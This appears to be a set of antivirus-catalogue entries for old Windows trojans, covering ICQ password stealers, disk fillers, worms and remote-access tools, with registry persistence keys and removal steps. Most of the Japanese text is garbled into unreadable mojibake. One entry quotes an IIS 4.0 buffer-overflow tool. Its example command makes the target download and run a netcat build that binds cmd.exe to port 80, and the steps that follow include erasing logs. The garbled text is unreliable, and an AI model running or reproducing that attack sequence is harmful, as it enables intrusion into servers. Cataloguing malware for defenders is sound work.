²òÅàÀè¤È¤·¤Æ»ØÄꤷ¤¿¥Ç¥£¥ì¥¯¥È¥ê¤Ë¡¢¤´¤ß¥Õ¥©¥ë¥À¤¬¤¿ ¤¯¤µ¤óºîÀ®¤µ¤ì¤ë¡£

TROJ_HDFILL


̾¡¡¡¡¾Î:TROJ_HDFILL

ÊÌ¡¡¡¡Ì¾:HDFILLER.TROJAN

¸À¡¡¡¡¸ì:English

ʬ¡¡¡¡Îà:Win32

ÂС¡¡¡¾Ý:Windows 95 / 98

¥¦¥¤¥ë¥¹¥µ¥¤¥º:14,848 bytes

ȯ¾ÍÃÏ:USA

¾Ü¡¡¡¡ºÙ:¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤϥϡ¼¥É¥Ç¥£¥¹¥¯¤Î¶õ¤­ÍÆÎÌ
¤¬¤Ê¤¯¤Ê¤ë¤Þ¤Ç¡¢¥ë¡¼¥È¥Ç¥£¥ì¥¯¥È¥ê¤Ë¥Õ¥¡¥¤¥ë¤òºîÀ®¤¹ ¤ë¡£
È÷¡¡¡¡¹Í:°ìö¼Â¹Ô¤µ¤ì¤¿¤é¡¢¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤ¬CFG¤Î³È
Ä¥»Ò¤Î¥Õ¥¡¥¤¥ë¤ò1.CFG¤«¤é99999999.CFG¤Þ¤ÇºîÀ®¤¹¤ë¡£¥Ï ¡¼¥É¥Ç¥£¥¹¥¯¤ÎÍÆÎ̤¬¤Ê¤¯¤Ê¤ë¤Þ¤Ç¡¢¤³¤Î³èư¤ò³¤±¤ë¡£ ºîÀ®¤µ¤ì¤¿¥Õ¥¡¥¤¥ë¤Î¥Õ¥¡¥¤¥ë¥µ¥¤¥º¤Ï1072¥Ð¥¤¥È¤Ç¤¢ ¤ë¡£

TROJ_HLLW_SOFT6


̾¡¡¡¡¾Î:TROJ_HLLW_SOFT6

ÊÌ¡¡¡¡Ì¾:W32.HI2000, W32.HLLW.SOFT6, W32.SOFT6, W32/
SOFT6.WORM
¸À¡¡¡¡¸ì:±Ñ¸ì

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿,¥ï¡¼¥à

ÂС¡¡¡¾Ý:£Î£Ô

¥¦¥¤¥ë¥¹¥µ¥¤¥º:322k¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:Windows 95/98¤Ç¤Ïưºî¤·¤Þ¤»¤ó¤¬¡¢Windows NT
¤Î¾ì¹ç¡¢¥Í¥Ã¥È¥ï¡¼¥¯¤òÄ̤¸¤ÆÁý¿£¤·¤Þ¤¹¡£´¶À÷¤¹¤ë¤È¡¢ ¸áÁ°9»þ¤«¤éÀµ¸á¤Î´Ö¡¢²èÌ̾å¤Ë"Hi 2000"¤È¤¤¤¦¥á¥Ã¥» ¡¼¥¸¤òɽ¼¨¤·Â³¤±¤Þ¤¹¡£ ¤³¤Î¥¦¥¤¥ë¥¹¤Ï£²¤Ä¤Î¥Õ¥¡¥¤¥ë¤«¤é¹½À®¤µ¤ì¤Þ¤¹¡£ instals.exe¤Ï300K¥Ð¥¤¥È¤Ç¡¢services.exe¤Ï322K¥Ð¥¤¥È¤Ç ¤¹¡£ Administration¸¢¸Â¤ò¤â¤Ä¥æ¡¼¥¶¤¬¥í¥°¥ª¥ó¤·¤¿¤é¡¢¥¦¥¤ ¥ë¥¹¤¬¥Í¥Ã¥È¥ï¡¼¥¯¤ò²ð¤·¤ÆInstall.exe¤ò¤Û¤«¤Î¥Þ¥·¥ó¤Î System32¥Ç¥£¥ì¥¯¥È¥ê¤Ë¥³¥Ô¡¼¤·¤ÆÁý¿£¤·¤Þ¤¹¡£ ¤Þ¤¿¡¢°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¥­¡¼¤ò²þÊѤ·¡¢¥³¥ó¥Ô¥å¡¼¥¿¤Îµ¯ ư»þ¤Ëɬ¤º¥ï¡¼¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤷ¤Þ¤¹¡£ HKEY_LOCAL_MACHINE\ Software\Microsoft\WindowsNT\Windows\Run
ÃÍ:serviss=instals.exe

È÷¡¡¡¡¹Í:****¼êưºï½ü¼ê½ç
Ctrl-Alt-Del¥­¡¼¤ò²¡¤·¤Æ¡¢"services "¤È¤¤¤¦¥¿¥¹¥¯¤ò½ªÎ»¤µ¤»¤Æ¤¯¤À¤µ¤¤¡£ ¥ì¥¸¥¹¥È¥ê¥¨¥Ç¥£¥¿¤òÍøÍѤ·¤Æ¡¢°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¥¨ ¥ó¥È¥ê¤ÎÃÍserviss=instals.exe¤òºï½ü¤·¤Æ¤¯¤À¤µ ¤¤¡£ HKEY_LOCAL_MACHINE\ Software\Microsoft\WindowsNT\Windows\Run
ÃÍ:serviss=instals.exe
services.exe,instals.exe¤È¤¤¤¦¥Õ¥¡ ¥¤¥ë¤¬¥·¥¹¥Æ¥à¤Ë¤Ê¤¤¤«¡¢¸¡º÷¤·¤Æ¤¯¤À¤µ¤¤¡£¤â¤·¤¢¤ì¤Ð ¤³¤ì¤òºï½ü¤·¤Æ¤¯¤À¤µ¤¤¡£ ***¥ì¥¸¥¹¥È¥ê¤òÊѹ¹¤¹¤ë¤Î ¤ÏÈó¾ï¤Ë¥Ç¥ê¥±¡¼¥È¤Ê¹Ô°Ù¤Ç¤¢¤êޤ¸í¤Ã¤¿Áàºî¤ò¹Ô¤¦¤Èޤ¥· ¥¹¥Æ¥à¤Ë»½ý¤òÍ¿¤¨¤ë²ÄǽÀ­¤¬¤¢¤ê¤Þ¤¹Ž¡¥ì¥¸¥¹¥È¥ê¤Î½¤Éü ¤Ï¿µ½Å¤Ë¹Ô¤Ã¤Æ¤¯¤À¤µ¤¤Ž¡

TROJ_ICQ_PWS_GEN


̾¡¡¡¡¾Î:TROJ_ICQ_PWS_GEN

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win9x/NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:66,884 bytes¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥È¥í¥¤¤Î
ÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¥Þ¥·¥ó¤ä¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤¹¤ë¤³¤È ¤Ï¤¢¤ê¤Þ¤»¤ó¡£¤·¤«¤·¼Â¹Ô¤¹¤ë¤ÈICQ¤Î¥Ñ¥¹¥ï¡¼¥É¤ò¥È¥í¥¤ ¤ÎÌÚÇϤκî¼Ô¤ËÁ÷¿®¤·¤Þ¤¹¡£ ¤³¤Î¥×¥í¥°¥é¥à¤ÏPhotoShop¤Î¥¢¥¤¥³¥ó¤ò»ÈÍѤ·¤Æ¡¢JPEG²è Áü¥Õ¥¡¥¤¥ë¤Ç¤¢¤ë¤è¤¦¤ËÁõ¤Ã¤Æ¤¤¤Þ¤¹¤¬¡¢¼ÂºÝ¤ÏPe¥¿¥¤¥× ¤Î¼Â¹Ô·¿¥Õ¥¡¥¤¥ë¤Ç¤¹¡£¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢¥Ç¥¹¥¯¥È ¥Ã¥×¾å¤Ënatasha1.jpg, JPG.EXE¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òºîÀ®¤·¡¢ ²èÁü¤òɽ¼¨¤·¤Þ¤¹¡£ ¤½¤Î´Ö¤Ë¡¢°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¥¨¥ó¥È¥ê¤ò²þÊѤ·¤Þ¤¹¡£ *HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\ Run]
"Path"="C:\WINDOWS\WINRSX.EXE"
*HKEY_USERS\.DEFAULT\Software\Mirabilis\ICQ\Agent\ Apps\Run]
"Path"="C:\WINDOWS\WINRSX.EXE"
*HKEY_CURRENT_USER\Software\Mirabilis\ICQ\ DefaultPrefs] "PGPKey"="ÿÿÿÿÁÒ\n8 "
"1"="C:\WINDOWS\¥Ç¥¹¥¯¥È¥Ã¥×\JPG.EXE"
¤³¤ì¤Ë¤è¤Ã¤Æ¡¢ICQ¤òµ¯Æ°¤¹¤ë¤Èɬ¤º¥¦¥¤¥ë¥¹¤¬Æ±»þ¤Ëµ¯Æ° ¤µ¤ì¤ë¤³¤È¤Ë¤Ê¤ê¤Þ¤¹¡£
È÷¡¡¡¡¹Í:ICQ¤ò¥¤¥ó¥¹¥È¡¼¥ë¤·¤Æ¤¤¤Ê¤±¤ì¤Ð¾åµ­¤Î¥ì¥¸¥¹

¥È¥ê¤ÎÃͤÏÄɲ䵤ì¤Þ¤»¤ó¡£C:\WINDOWS\WINRSX.EXE""C:\
WINDOWS\¥Ç¥¹¥¯¥È¥Ã¥×\JPG.EXE"¥Õ¥¡¥¤¥ë¤òºï½ü¤¹¤ì¤Ð¥¦¥¤ ¥ë¥¹¤Î½üµî¤Ï´°Î»¤Ç¤¹¡£ ICQ¤ò¥¤¥ó¥¹¥È¡¼¥ë¤·¤Æ¤¤¤ë¾ì¹ç¤Ï¡¢°Ê²¼¤Î¼ê½ç¤Ë½¾¤Ã¤Æ¤¯ ¤À¤µ¤¤¡£ ­¡¾åµ­¥ì¥¸¥¹¥È¥ê¥¨¥ó¥È¥ê¤òºï½ü¤¹¤ë ­¢¥Þ¥·¥ó¤òºÆµ¯Æ°
­£C:\WINDOWS\WINRSX.EXE""C:\WINDOWS\¥Ç¥¹¥¯¥È¥Ã¥×\JPG.
EXE"¥Õ¥¡¥¤¥ë¤òºï½ü¤¹¤ë ***¥ì¥¸¥¹¥È¥ê¤òÊѹ¹¤¹¤ë¤Î¤ÏÈó¾ï¤Ë¥Ç¥ê¥±¡¼¥È¤Ê¹Ô°Ù¤Ç¤¢ ¤êޤ¸í¤Ã¤¿Áàºî¤ò¹Ô¤¦¤Èޤ¥·¥¹¥Æ¥à¤Ë»½ý¤òÍ¿¤¨¤ë²ÄǽÀ­¤¬ ¤¢¤ê¤Þ¤¹Ž¡¥ì¥¸¥¹¥È¥ê¤Î½¤Éü¤Ï¿µ½Å¤Ë¹Ô¤Ã¤Æ¤¯¤À¤µ¤¤Ž¡

TROJ_ICQGREETING


̾¡¡¡¡¾Î:TROJ_ICQGREETING

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win9x/NT

¾Ü¡¡¡¡ºÙ:TROJ_ICQGREETING ¤ÏE-mail¤Ç³È»¶¤¹¤ë¥¤¥ó¥¿
¡¼¥Í¥Ã¥È¥ï¡¼¥à¤Ç¤¢¤ê¡¢ Microsoft Outlook¤òÍøÍѤ·¤Æ¥¦¥¤¥ë¥¹¥×¥í¥°¥é¥à¼«¿È¤òź ÉÕ¤·¤¿¥á¡¼¥ë¤ò¼«Æ°Åª¤ËÁ÷¿®¤·¤Þ¤¹¡£¤³¤ÎźÉÕ¥Õ¥¡¥¤¥ë ICQ_Greetings.exe ¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢¥· ¥¹¥Æ¥à¤Ë´¶À÷¤·¡¢15 ʬ¤´¤È¤ËMicrosoft Outlook¤ËÅÐÏ¿¤µ¤ì¤¿2¤Ä¤Î ¥á¡¼¥ë¥¢¥É¥ì¥¹¤ËÂФ·¤Æ¥á¡¼¥ë¤òÁ÷¿®¤·¤Æ¤·¤Þ¤¤¤Þ¤¹¡£ Á÷ÉÕ¤µ¤ì¤ë¥á¡¼¥ë¤Ï°Ê²¼¤Î¤è¤¦¤Ê¤â¤Î¤Ç¤¹¡£ ¥¿¥¤¥È¥ë ¤Ê¤· ËÜʸ ¤Ê¤· źÉÕ¥Õ¥¡¥¤¥ë ICQ_Greetings.exe ¤Þ¤¿¡¢2000ǯ¤Î1·î1Æü¤Ë¤Ê¤ë¤È¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤ò¥Õ¥©¡¼¥Þ ¥Ã¥È¤·¤Æ¤·¤Þ¤¦¤È¤¤¤¦Ç˲õ¥ë¡¼¥Á¥ó¤ò»ý¤Ã¤Æ¤¤¤Þ¤¹¡£¤·¤« ¤·¡¢¥¦¥¤¥ë¥¹¤Î¥³¡¼¥É¤Ë¥Ð¥°¤¬¤¢¤ê¡¢¤³¤Î³èư¤ÏÀµ¾ï¤Ëư ºî¤·¤Þ¤»¤ó¡£ TROJ_ICQGREETING ¤Ï¡¢Windows 9x /NT/2000 ¾å¤Çưºî¤·¤· ¤Þ¤¹¡£¼Â¹Ô¤¹¤ë¤È¡¢C¥É¥é¥¤¥Ö¤Î¥ë¡¼¥È¤ËICQ.EXE¤È¤¤¤¦Ì¾ ¾Î¤Ç¥¦¥¤¥ë¥¹¥×¥í¥°¥é¥à¤Î¥³¥Ô¡¼¤òºîÀ®¤·¤Þ¤¹¡£ ¤½¤·¤Æ°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¤ËÃͤòÄɲä·¡¢¥·¥¹¥Æ¥à¤Îµ¯Æ°»þ ¤Ëɬ¤º¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤷ¤Þ¤¹¡£ Windows95/98 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run
Icq99b = ¡ÈC:\ICQ.EXE¡É
Windows NT HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\ CurrentVersion\Windows\Run
Icq99b = ¡ÈC:\ICQ.EXE¡É

È÷¡¡¡¡¹Í:
****¼êưºï½ü¼ê½ç ¥ì¥¸¥¹¥È¥ê¥¨¥Ç¥£¥¿¤òÍøÍѤ·¤Æ¡¢°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¥¨
¥ó¥È¥ê¤ÎÃÍC:\ICQ.Exe¤òºï½ü¤·¤Æ¤¯¤À¤µ¤¤¡£
Windows95/98 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run
Icq99b = ¡ÈC:\ICQ.EXE¡É
Windows NT HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\ CurrentVersion\Windows\Run
Icq99b = ¡ÈC:\ICQ.EXE¡É
ICQ_Greetings.exe ¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤¬¥·¥¹¥Æ¥à ¤Ë¤Ê¤¤¤«¡¢¸¡º÷¤·¤Æ¤¯¤À¤µ¤¤¡£¤â¤·¤¢¤ì¤Ð¤³¤ì¤òºï½ü¤·¤Æ ¤¯¤À¤µ¤¤¡£ ***¥ì¥¸¥¹¥È¥ê¤òÊѹ¹¤¹¤ë¤Î ¤ÏÈó¾ï¤Ë¥Ç¥ê¥±¡¼¥È¤Ê¹Ô°Ù¤Ç¤¢¤êޤ¸í¤Ã¤¿Áàºî¤ò¹Ô¤¦¤Èޤ¥· ¥¹¥Æ¥à¤Ë»½ý¤òÍ¿¤¨¤ë²ÄǽÀ­¤¬¤¢¤ê¤Þ¤¹Ž¡¥ì¥¸¥¹¥È¥ê¤Î½¤Éü ¤Ï¿µ½Å¤Ë¹Ô¤Ã¤Æ¤¯¤À¤µ¤¤Ž¡

TROJ_IIS_HACK


̾¡¡¡¡¾Î:TROJ_IIS_HACK

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:WIN32

¥¦¥¤¥ë¥¹¥µ¥¤¥º:8¥­¥í¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:¥³¥ó¥Ô¥å¡¼¥¿¥»¥­¥å¥ê¥Æ¥£¤Î³«È¯¥Á¡¼¥àeEye¤¬
À߷פ·¤¿¥Ï¥Ã¥«¡¼¥Ä¡¼¥ë¡£¥Þ¥¤¥¯¥í¥½¥Õ¥È¡¦¥Í¥Ã¥È¥ï¡¼¥¯ ¤ÎÃ×̿Ū¤Ê¥»¥­¥å¥ê¥Æ¥£¡¦¥Û¡¼¥ë¤ò¥Ç¥â¥ó¥¹¥È¥ì¡¼¥È¤¹¤ë ¤¿¤á¤ËºîÀ®¤µ¤ì¤¿¡£ ¥Þ¥¤¥¯¥í¥½¥Õ¥ÈŽ¥¥Í¥Ã¥È¥ï¡¼¥¯¤ËÃ×̿Ū¤Ê¥»¥­¥å¥ê¥Æ¥£Ž¥¥Û ¡¼¥ë¤¬¤¢¤ë¤³¤È¤òȯ¸«¤·¤¿eEye¤Ï¡¢¤³¤Î¥Ð¥°¤ò¥Þ¥¤¥¯¥í¥½ ¥Õ¥È¼Ò¤ËÄÌÃΤ·¤¿¡£¤·¤«¤·¡¢5Æü´Ö¤Î¤ä¤ê¤È¤ê¤Î¤¢¤È¡¢¥Þ¥¤ ¥¯¥í¥½¥Õ¥È¼Ò¤«¤é¤Ï°ìÀÚ±þÅú¤¬¤Ê¤¯¤Ê¤Ã¤Æ¤·¤Þ¤Ã¤¿¡£¤½¤³ ¤Ç¡¢¤³¤¦¤·¤¿¥»¥­¥å¥ê¥Æ¥£Ž¥¥Û¡¼¥ë¤Î¸ºß¤ò¸ø¤Ë¤¹¤ë¤Î¤¬¼« ʬ¤¿¤Á¤ÎµÁ̳¤À¤È´¶¤¸¤¿eEye¤Ï¡¢¤³¤Î¥Ï¥Ã¥«¡¼¥Ä¡¼¥ë¤òºî À®¤·¤¿¤È¤¤¤¦¡£ °Ê²¼¡¢eEye¤Ë¤è¤ëÀâÌÀ¡£
ÂоÝ:
»ä¤¿¤Á¤Ï¡¢¤¤¤ï¤Ð¥µ¥ó¥×¥ë¤È¤·¤Æ¡¢´ë¶È¶ÈÀÓ¾å°Ì500¼Ò¤Î¤Ê ¤«¤«¤é¡¢ÂоݤȤ¹¤ë´ë¶È¤ò¥é¥ó¥À¥à¤ËÁª¤Ó¤Þ¤·¤¿¡£À¸¤«¤¹ ¤â»¦¤¹¤â¤¢¤Ê¤¿¤¬¤¿¼¡Âè¤Ç¤¹¡£ÂоݤȤʤë´ë¶È¤Ë¤Ï¡¢ CiscoPix¤Ê¤É¡¢ºÇ¿·¤Î¥»¥­¥å¥ê¥Æ¥£¥·¥¹¥Æ¥à¤¬Æ³Æþ¤µ¤ì¤Æ ¤¤¤ë¤â¤Î¤ÈÁÛÄꤷ¤Þ¤¹¡£¤³¤Î¤È¤­¡¢³°Éô¤«¤é¥µ¡¼¥Ð¡¼¤Ë¤Ï Àܳ¤Ç¤­¤ë¤Î¤Ï¥Ý¡¼¥È80ÈÖ¤À¤±¤Ç¤¹¡£ ¤³¤Î¥»¥­¥å¥ê¥Æ¥£¥Û¡¼¥ë¤ò»È¤¨¤Ð¡¢¥ê¥â¡¼¥È¥Þ¥·¥ó¤Î¥Ð¥Ã ¥Õ¥¡¤ò¥ª¡¼¥Ð¡¼¥Õ¥í¡¼¤µ¤»¡¢¤«¤Ä¡¢»ä¤¿¤Á¤ÎWeb¥µ¡¼¥Ð¤«¤é ¥È¥í¥¤¤ÎÌÚÇÏ·¿¥¦¥¤¥ë¥¹¤ò¥À¥¦¥ó¥í¡¼¥É¤·¡¢¤½¤ì¤ò¼Â¹Ô¤¹ ¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£¤³¤Î¥Ç¥â¥ó¥¹¥È¥ì¡¼¥·¥ç¥ó¤Î¤¿¤á¤Ë»ä ¤¿¤Á¤¬ºîÀ®¤·¤¿¥¦¥¤¥ë¥¹¤Ï¡¢Ncx.exe¤Ç¤¹¡£Ncx.exe¤Ï netcat.exe¤ò¥Ï¥Ã¥¯¥¢¥Ã¥×¤·¤¿¤â¤Î¤Ç¡¢¾ï¤Ë¡É -l -p 80 - t -e¡É ¤òcmd.exe¤Î°ú¿ô¤È¤·¤Æ»È¤¨¤ë¤è¤¦¤Ë¤·¤Æ¤¢¤ê¤Þ ¤¹¡£¤Ä¤Þ¤ê¡¢netcat¤Ï¡¢¤¤¤Ä¤Ç¤â¥Ý¡¼¥È80ÈÖ¤Ëcmd.exe¤òÀÜ Â³¤Ç¤­¤ë¤ï¤±¤Ç¤¹¡£¤Þ¤¿¡¢¥Õ¥¡¥¤¥ë¥µ¥¤¥º¤â50¥­¥í¥Ð¥¤¥È ¤«¤é30¥­¥í¥Ð¥¤¥È¤Ë¾®¤µ¤¯¤Ê¤ê¤Þ¤·¤¿¡£ ¼Â¹ÔÎã¤Ç¤¹¡£
X:\Code>iishack example.com 80 ourserver.com/ncx.exe
------(¥Þ¥¤¥¯¥í¥½¥Õ¥È¼ÒIIS 4.0¤Î¥ê¥â¡¼¥È¡¦¥Ð¥Ã¥Õ¥¡¤Î ¥ª¡¼¥Ð¡¼¥Õ¥í¡¼¤òÍøÍѤ·¤Þ¤¹)----------------- (c) dark spyrit – barns@eeye.com.
http://www.eEye.com

»ÈÍÑË¡: iishack
Îã –Iishack www.example.com 80 www.myserver.com /thetrojan.exe
"http://"¤ò¤ÎÁ°¤Ë¤Ä¤±¤Ê¤¤¤è¤¦Ãí°Õ¤·¤Æ¤¯¤À¤µ¤¤¡£
----------------------------------------------------- ---------- ¥Ç¡¼¥¿Á÷ÉÕ
Ãí°Õ: ¥È¥í¥¤¤ÎÌÚÇÏ·¿¥¦¥¤¥ë¥¹¤Î¥À¥¦¥ó¥í¡¼¥É¤Ë¤Ï»þ´Ö¤¬
¤«¤«¤ê¤Þ¤¹¡£ÃæÃǤµ¤»¤Ê¤¤¤è¤¦¤Ë¤·¤Æ¤¯¤À¤µ¤¤¡£
X:\Code>telnet example.com 80
Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp.
C:\>[You have full access to the system, happy

browsing :)]

C:\>[Add a scheduled task to restart inetinfo in X
minutes]
C:\>[Add a scheduled task to delete ncx.exe in X-1
minutes]
C:\>[Clean up any trace or logs we might have left
behind.]
C:\>exit

Ãí°Õ:
¡¡Telnet ¤Çexit¤òÂǤÁ¹þ¤á¤Ð¡¢ncx.exe¤Ï¥¢¥ó¥í¡¼¥É¤µ¤ì ¥Ý¡¼¥È80ÈÖ¤ËÀܳ¤·¤Ê¤¯¤Ê¤ê¤Þ¤¹¡£¤·¤¿¤¬¤Ã¤Æ¡¢Web¥µ ¡¼¥Ó¥¹¤òºÆ³«¤¹¤ë¤³¤È¤¬¤Ç¤­¡¢¤¹¤Ù¤ÆÄ̾ï¤Î¾õÂÖ¤ËÌá¤ê¤Þ ¤¹¡£¾å¤Ëµó¤²¤¿Îã¤Ï¡¢¤³¤Î¥Ä¡¼¥ë¤ò¼êÁ᤯¥Ç¥â¥ó¥¹¥È¥ì ¡¼¥È¤¹¤ë¤¿¤á¤Î¤â¤Î¤Ç¤¹¡£¤Û¤«¤Ë¤âÌäÂêÅÀ¤Ï¤¢¤ê¤Þ¤¹¤¬¡¢ ¤³¤ì¤À¤±¤Ç·Ù¹ð¤Ë¤Ï½¼Ê¬¤À¤È¹Í¤¨¤Æ¤¤¤Þ¤¹¡£

TROJ_KAZIMAS


̾¡¡¡¡¾Î:TROJ_KAZIMAS

ÊÌ¡¡¡¡Ì¾:TROJ_ KAZIMAS.Aޤ TROJ_ KAZIMAS.B

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:7ޤ054¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:-¡¡¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿°­¼Á¥×¥í¥°¥é¥à¤Ç¤¢¤ê
ޤ´¶À÷¤Ï¤·¤Ê¤¤Ž¡ ¡¡-¡¡¥·¥¹¥Æ¥à¤ÎAUTOEXEC.BAT¤Ë°Ê²¼¤Î¹Ô¤òÉÕ¤±²Ã¤¨¡¢µ¯Æ° »þ¤Ë¥¦¥¤¥ë¥¹¥³¡¼¥É¤¬ºÇ½é¤Ë¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤Ë¤¹¤ë¡£
copy c:\windows\system\psys.exe c:\windows\kazimas.
exe >nul
copy c:\windows\kazimas.exe c:\kazimas.exe >nul

c:\kazimas.exe >nul
¡¡-¤Þ¤¿¡¢¤¤¤¯¤Ä¤«¤Î¥Ç¥£¥ì¥¯¥È¥ê¤Ë¡¢Ì¾Á°¤òÊѤ¨¤Æ¥¦¥¤¥ë ¥¹¥³¡¼¥É¤ò¥³¥Ô¡¼¤·¡¢Ä̾ï¤Î¥¢¥×¥ê¥±¡¼¥·¥ç¥ó¤òÁõ¤¦¡£¤³ ¤Î¤È¤­ºîÀ®¤µ¤ì¤ë¥Õ¥¡¥¤¥ë̾¤Ï¼¡¤Î¤È¤ª¤ê¡£
c:\windows\kazimas.exec:\windows\system\psys.exec:\

icqpatch.exec:\mirc\nuker.exec:\mirc\download\mirc60.

exec:\mirc\logs\logging.exec:\mirc\sounds\player.exe

c:\games\spider.exec:\windows\freemem.exe

»³²:
-¡¡¥Þ¥·¥ó¤ÎIRC(Internet Related Chat)¥¯¥é¥¤¥¢¥ó¥È¤òÍÑ ¤¤¤Æ¡¢¹ç½°¹ñ¤ÎDalnet¥Í¥Ã¥È¥ï¡¼¥¯(¥¢¥É¥ì¥¹irc.dal.net) ¤Ë¡¢ kazimas¤È¤¤¤¦¥æ¡¼¥¶¡¼£É£Ä¤òÍѤ¤¤Æ¼«Æ°Åª¤ËÀܳ¤·¡¢ Dalnet¤ËÀÜÂ³Ãæ¤Î¾¤Î¥æ¡¼¥¶¡¼¤Ë¤â¥¦¥¤¥ë¥¹¥³¡¼¥É¤òÁ÷ÉÕ ¤·¤è¤¦¤È¤¹¤ëŽ¡

TROJ_KILLMAN


̾¡¡¡¡¾Î:TROJ_KILLMAN

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:1ޤ451¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:¤³¤Î¥¦¥¤¥ë¥¹¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿¥¦¥¤¥ë¥¹¤Ç¤¢
¤ê¡¢Â¾¤Î¥Õ¥¡¥¤¥ë¤ä¥·¥¹¥Æ¥à¤Ë´¶À÷¤¹¤ë¤³¤È¤Ï¤Ê¤¤¡£ ¡¡ »³² ¥æ¡¼¥¶¡¼¤¬¥È¥í¥¤¤ÎÌÚÇÏ·¿¥¦¥¤¥ë¥¹¤Èµ¤¤Å¤«¤º¤Ë¼Â¹Ô¤·¤Æ ¤·¤Þ¤¦¤È¡¢¥¦¥¤¥ë¥¹¤Ï¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Î¥·¥ê¥ó¥À¡¼£°ÈÖ ÃÏ¡¢¥»¥¯¥¿¡¼£°ÈÖÃÏ¡¢¥Ø¥Ã¥À¡¼£°ÈÖÃϤª¤è¤Ó¥È¥é¥Ã¥¯£°ÈÖ ÃϤò¥Õ¥©¡¼¥Þ¥Ã¥È¤¹¤ëŽ¡

TROJ_MILLEN_CLNT


̾¡¡¡¡¾Î:TROJ_MILLEN_CLNT

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win95 / Win98 / Win NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:164.352 bytesȯ¸«Æü:1998/12

¾Ü¡¡¡¡ºÙ:NetBus¥¦¥¤¥ë¥¹¤äBackOrifice¥¦¥¤¥ë¥¹¤È»÷¤¿¡¢
¥Í¥Ã¥È¥ï¡¼¥¯¾å¤Î¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¤Ç¤¢¤ë¡£¥µ¡¼¥Ð¡¼/¥¯¥é ¥¤¥¢¥ó¥È·¿¤Î¥×¥í¥°¥é¥à¤Çޤ¥µ¡¼¥Ð¡¼¥â¥¸¥å¡¼¥ë¤ÏTROJ_ MILLEN_SVR,¥¯¥é¥¤¥¢¥ó¥È¥â¥¸¥å¡¼¥ë¤ÏTROJ_MILLEN_CLNT¤È ¤·¤Æ¸¡½Ð¤µ¤ì¤ëŽ¡TROJ_MILLEN_SVR¤Î¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ìޤ ¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀܳ¤µ¤ì¤¿¥³¥ó¥Ô¥å¡¼¥¿¤Ø¤Î´¶À÷¤ËÀ®¸ù ¤·¤¿¾ì¹ç¡¢¥Ï¥Ã¥«¡¼¤Ï¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à(TROJ_ MILLEN_CLNT)¤òÍøÍѤ·¤ÆŽ¤¤½¤Î¥Þ¥·¥ó¤ÎIP¥¢¥É¥ì¥¹¤òÆþ¼ê ¤·¡¢¤½¤Î¥³¥ó¥Ô¥å¡¼¥¿¤ò¤µ¤Þ¤¶¤Þ¤ËÁàºî¤¹¤ë¤³¤È¤¬¤Ç¤­ ¤ë¡£
È÷¡¡¡¡¹Í:¥¯¥é¥¤¥¢¥ó¥È¥â¥¸¥å¡¼¥ë¤òÍøÍѤ¹¤ë¤Èޤ¥µ¡¼¥Ð
